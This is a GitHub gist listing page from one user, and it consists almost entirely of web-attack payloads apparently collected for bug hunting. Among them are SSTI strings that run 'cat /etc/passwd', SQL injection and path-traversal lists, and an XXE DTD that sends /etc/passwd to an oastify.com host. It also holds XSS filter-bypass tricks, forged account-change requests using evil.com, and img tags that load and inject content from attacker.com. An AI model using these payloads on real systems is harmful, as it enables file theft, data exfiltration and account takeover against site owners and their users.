ratnadip1998
ratnadip1998
/ gist:021ab5ed1b74756f7e0ae038d62a2834
Last active
March 12, 2026 22:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /oauth/token HTTP/1.1 | |
| Host: www.strava.com | |
| Content-Type: application/x-www-form-urlencoded | |
| User-Agent: BurpSuite | |
| Connection: close | |
| client_id=YOUR_CLIENT_ID& | |
| client_secret=YOUR_CLIENT_SECRET& | |
| grant_type=client_credentials |
ratnadip1998
/ gist:bd28e18959eb790764ae45ccb24883a3
Last active
February 5, 2026 20:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SSTI payloads (one per line) | |
| # payload||expected_output | |
| # Example confirm: | |
| # {{7*7}}||49 | |
| # | |
| # File-read confirm example: | |
| # {{lipsum.__globals__['os'].popen('cat /etc/passwd').read()}}||root:x:0:0 | |
| # Safe math confirms | |
| {{7*7}}||49 |
ratnadip1998
/ ok
Created
February 2, 2026 14:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| '' | |
| ` | |
| " | |
| "" | |
| % | |
| , | |
| \ | |
| ') | |
| ") |
ratnadip1998
/ Ok
Created
January 28, 2026 13:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| etc/passwd | |
| /etc/passwd | |
| ../etc/passwd | |
| ../../etc/passwd | |
| ../../../etc/passwd | |
| ../../../../etc/passwd | |
| ../../../../../etc/passwd | |
| ../../../../../../etc/passwd | |
| ../../../../../../../etc/passwd | |
| ../../../../../../../../etc/passwd |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. SQLI: | |
| ' | |
| " | |
| ') | |
| ") | |
| ')) | |
| ")) | |
| '-- | |
| "-- | |
| '# |
ratnadip1998
/ exfil.dtd
Created
October 3, 2025 09:54
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://%file%.h6ojcmzsjqtnjvjyv6als7vbl2rtfp3e.oastify.com/'>"> | |
| %eval; |
ratnadip1998
/ t
Created
August 18, 2025 15:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##Rare Cases | |
| */</script><script>alert()/* | |
| 'href=javascript:alert()>click me<a/y=' | |
| "autofocus onclick=’alert()' | |
| Akamai Tricks & Tips | |
| * alert() => window['alert']() | |
| * alert() => this['alert']() | |
| * alert() => (alert)() | |
| * alert() => eval(atob('YWxlcnQoKQ==')) |
ratnadip1998
/ gt
Last active
August 4, 2025 15:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| __type(name: "TableauUser") { | |
| name | |
| kind | |
| fields { | |
| name | |
| type { | |
| name | |
| kind | |
| ofType { |
ratnadip1998
/ xsssss
Last active
July 1, 2025 21:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://example.com/page?path=<img src="/change-email?new_email=hacker@evil.com"> | |
| https://example.com/page?path=<iframe src="/delete-account?confirm=true" style="display:none;"> | |
| fetch('/action?param=value', { credentials: 'include' }); |
ratnadip1998
/ tes
Last active
June 6, 2025 08:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img src="javascript:fetch('//attacker.com/test.html').then(r=>r.text()).then(t=>document.body.innerHTML=t)"> | |
| <img src=x style="content:url('http://attacker.com/test.html')"> |
NewerOlder